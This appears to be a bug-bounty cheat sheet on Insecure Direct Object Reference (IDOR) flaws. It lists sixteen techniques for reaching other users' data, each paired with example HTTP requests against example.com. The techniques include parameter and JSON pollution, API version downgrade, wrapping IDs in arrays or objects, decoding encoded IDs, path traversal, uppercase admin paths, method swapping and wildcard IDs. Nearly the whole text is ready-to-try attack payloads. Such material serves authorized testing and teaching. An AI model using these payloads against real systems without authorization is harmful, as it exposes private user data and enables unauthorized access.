# Insecure Direct Object Reference (IDOR) ## Introduction IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. ## Where to find - Usually it can be found in APIs. - Check the HTTP request that contain unique ID, for example `user_id` or `id` ## How to exploit 1. Add parameters onto the endpoints for example, if there was ``` GET /api/v1/getuser HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` GET /api/v1/getuser?id=1234 HTTP/1.1 Host: example.com ... ``` 2. HTTP Parameter pollution ``` POST /api/get_profile HTTP/1.1 Host: example.com ... user_id=hacker_id&user_id=victim_id ``` 3. Add .json to the endpoint ``` GET /v2/GetData/1234 HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` GET /v2/GetData/1234.json HTTP/1.1 Host: example.com ... ``` 4. Test on outdated API Versions ``` POST /v2/GetData HTTP/1.1 Host: example.com ... id=123 ``` Try this to bypass ``` POST /v1/GetData HTTP/1.1 Host: example.com ... id=123 ``` 5. Wrap the ID with an array. ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {"user_id":111} ``` Try this to bypass ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {"id":[111]} ``` 6. Wrap the ID with a JSON object ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {"user_id":111} ``` Try this to bypass ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {"user_id":{"user_id":111}} ``` 7. JSON Parameter Pollution ``` POST /api/get_profile HTTP/1.1 Host: example.com ... {"user_id":"hacker_id","user_id":"victim_id"} ``` 8. Try decode the ID, if the ID encoded using md5,base64,etc ``` GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1 Host: example.com ... ``` dmljdGltQG1haWwuY29t => victim@mail.com 9. If the website using GraphQL, try to find IDOR using GraphQL ``` GET /graphql HTTP/1.1 Host: example.com ... ``` ``` GET /graphql.php?query= HTTP/1.1 Host: example.com ... ``` 10. MFLAC (Missing Function Level Access Control) ``` GET /admin/profile HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` GET /ADMIN/profile HTTP/1.1 Host: example.com ... ``` 11. Try to swap uuid with number ``` GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` GET /file?id=302 Host: example.com ... ``` 12. Change HTTP Method ``` GET /api/v1/users/profile/111 HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` POST /api/v1/users/profile/111 HTTP/1.1 Host: example.com ... ``` 13. Path traversal ``` GET /api/v1/users/profile/victim_id HTTP/1.1 Host: example.com ... ``` Try this to bypass ``` GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1 Host: example.com ... ``` 14. Change request `Content-Type` ``` GET /api/v1/users/1 HTTP/1.1 Host: example.com Content-type: application/xml ``` Try this to bypass ``` GET /api/v1/users/2 HTTP/1.1 Host: example.com Content-type: application/json ``` 15. Send wildcard instead of ID ``` GET /api/users/111 HTTP/1.1 Host: example.com ``` Try this to bypass ``` GET /api/users/* HTTP/1.1 Host: example.com ``` ``` GET /api/users/% HTTP/1.1 Host: example.com ``` ``` GET /api/users/_ HTTP/1.1 Host: example.com ``` ``` GET /api/users/. HTTP/1.1 Host: example.com ``` 16. Try google dorking to find new endpoint ## References * [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup